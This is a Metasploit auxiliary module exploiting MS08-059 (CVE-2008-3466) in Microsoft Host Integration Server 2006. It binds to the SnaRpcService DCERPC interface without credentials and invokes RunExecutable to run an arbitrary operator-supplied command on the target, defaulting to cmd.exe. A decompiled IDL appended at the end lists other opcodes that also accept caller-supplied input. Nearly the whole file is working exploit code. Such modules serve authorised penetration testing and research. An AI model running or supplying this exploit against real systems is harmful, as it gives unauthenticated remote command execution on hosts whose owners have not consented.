##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
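class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DCERPC

  # SnaRpcService interface registered by Host Integration Server 2006.
  # Opnum 0x01 (_SnaRpcService_RunExecutable) takes two [in][string]
  # parameters; see the decompiled IDL at the bottom of this file.
  SNA_RPC_UUID = 'ed6ee250-e0d1-11cf-925a-00aa00c006c1'.freeze
  RUN_EXECUTABLE_OPNUM = 0x01

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Host Integration Server 2006 Command Execution Vulnerability',
      'Description'    => %q{
        This module exploits a command-injection vulnerability in Microsoft
        Host Integration Server 2006. The SnaRpcService DCERPC interface
        exposes a RunExecutable call (opnum 1) that is invoked here with the
        supplied COMMAND and ARGS; the module binds to the interface without
        presenting any credentials. With RPORT set to 0 (the default) the
        service port is discovered through the endpoint mapper on RHOST;
        a non-zero RPORT is used directly. Note that the default ARGS writes
        a file named metasploit.txt on the target, which is a visible artifact.
      },
      'DefaultOptions' =>
        {
          'DCERPC::ReadTimeout' => 300 # Long-running RPC calls
        },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'MSB', 'MS08-059' ],
          [ 'CVE', '2008-3466' ],
          [ 'OSVDB', '49068' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745' ],
        ],
      'DisclosureDate' => '2008-10-14'))

    register_options(
      [
        Opt::RPORT(0),
        OptString.new('COMMAND', [ true, 'The command to execute', 'cmd.exe']),
        OptString.new('ARGS', [ true, 'The arguments to the command', '/c echo metasploit > metasploit.txt'])
      ])
  end

  # Resolves the SnaRpcService port, binds to the interface and issues one
  # RunExecutable call carrying COMMAND and ARGS.
  #
  # RPORT == 0 triggers endpoint-mapper discovery on RHOST; any other value
  # is connected to as given. Returns nil; progress and failures are reported
  # through print_status / print_error. The socket is always released, even
  # when the bind or the call raises.
  def run
    dport = datastore['RPORT'].to_i

    if dport.zero?
      dport = find_service_port
      unless dport
        print_error('Could not determine the RPC port used by the Service.')
        return
      end
      print_status("Discovered Host Integration Server RPC service on port #{dport}")
    end

    connect(true, { 'RPORT' => dport })

    begin
      # Build the handle from the port actually connected to rather than the
      # raw RPORT option, which is 0 on the discovery path.
      dcerpc_handle(SNA_RPC_UUID, '1.0', 'ncacn_ip_tcp', [dport])
      print_status("Binding to #{handle} ...")

      dcerpc_bind(handle)
      print_status("Bound to #{handle} ...")

      # Two NDR conformant strings, matching the [in][string] char arg_1/arg_2
      # parameters of _SnaRpcService_RunExecutable.
      stub = NDR.string("#{datastore['COMMAND']}") + NDR.string("#{datastore['ARGS']}")

      print_status("Sending command: #{datastore['COMMAND']} #{datastore['ARGS']}")

      begin
        dcerpc_call(RUN_EXECUTABLE_OPNUM, stub)
      rescue Rex::Proto::DCERPC::Exceptions::NoResponse
        # Deliberately ignored: the server may not answer within the read
        # timeout (presumably while the spawned process runs — not confirmed
        # here), and a missing reply does not mean the call failed.
      end
    ensure
      # Release the socket on every exit path, including DCERPC faults that
      # the rescue above does not cover.
      disconnect
    end
  end

  private

  # Asks the endpoint mapper on RHOST for the TCP port of SNA_RPC_UUID,
  # trying interface version 1.0 first and then 1.1.
  #
  # @return [Integer, nil] the discovered port, or nil if neither version is registered
  def find_service_port
    %w[1.0 1.1].each do |version|
      port = dcerpc_endpoint_find_tcp(datastore['RHOST'], SNA_RPC_UUID, version, 'ncacn_ip_tcp')
      return port if port
    end
    nil
  end
end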
=begin
Decompiled IDL of the SnaRpcService interface. This module calls only
opcode 0x01 (_SnaRpcService_RunExecutable). Note that the same interface
also exposes _SnaRpcService_RunExecutableEx (0x06) and
_SnaRpcService_CallRemoteDll (0x02), which likewise accept caller-supplied
strings/buffers; they are not exercised here.

/*
 * IDL code generated by mIDA v1.0.8
 * Copyright (C) 2006, Tenable Network Security
 * http://cgi.tenablesecurity.com/tenable/mida.php
 *
 *
 * Decompilation information:
 * RPC stub type: inline
 */

[
  uuid(ed6ee250-e0d1-11cf-925a-00aa00c006c1),
  version(1.1)
]

interface mIDA_interface
{

  unknown _SnaRpcService_PingServer (
  );


  /* opcode: 0x01, address: 0x01002CBB */

  small _SnaRpcService_RunExecutable (
    [in][string] char arg_1,
    [in][string] char arg_2
  );

  /* opcode: 0x02, address: 0x01002F0B */

  long _SnaRpcService_CallRemoteDll (
    [in] long arg_1,
    [in][size_is(arg_1)] byte arg_2[],
    [in] long arg_3,
    [in][size_is(arg_1)] byte arg_4[]
  );

  unknown _SnaRpcService_GetInstalledDrives (
  );

  unknown _SnaRpcService_ServiceTableUpdate (
  );


  /* opcode: 0x05, address: 0x0100363C */

  long _SnaRpcService_GetWindowsVersion (
    [in] long arg_1,
    [in, out][size_is(arg_1)] byte arg_2[]
  );


  /* opcode: 0x06, address: 0x01003942 */

  small _SnaRpcService_RunExecutableEx (
    [in][string] char arg_1,
    [in][string] char arg_2,
    [in][string] char arg_3
  );


  /* opcode: 0x07, address: 0x01003BAB */

  long _SnaRpcService_GetDLCMediaType (
    [in][string] char arg_1,
    [out][ref] long * arg_2
  );


  /* opcode: 0x08, address: 0x01003E29 */

  small _SnaRpcService_UserHasAccess (
    [in] long arg_1
  );


  /* opcode: 0x09, address: 0x01004061 */

  small _SnaRpcService_ConfigureHisService (
    [in][string] char arg_1
  );


  /* opcode: 0x0A, address: 0x01004272 */

  small _SnaRpcService_ConfigureServiceAccount (
    [in][string] char arg_1
  );

}
=end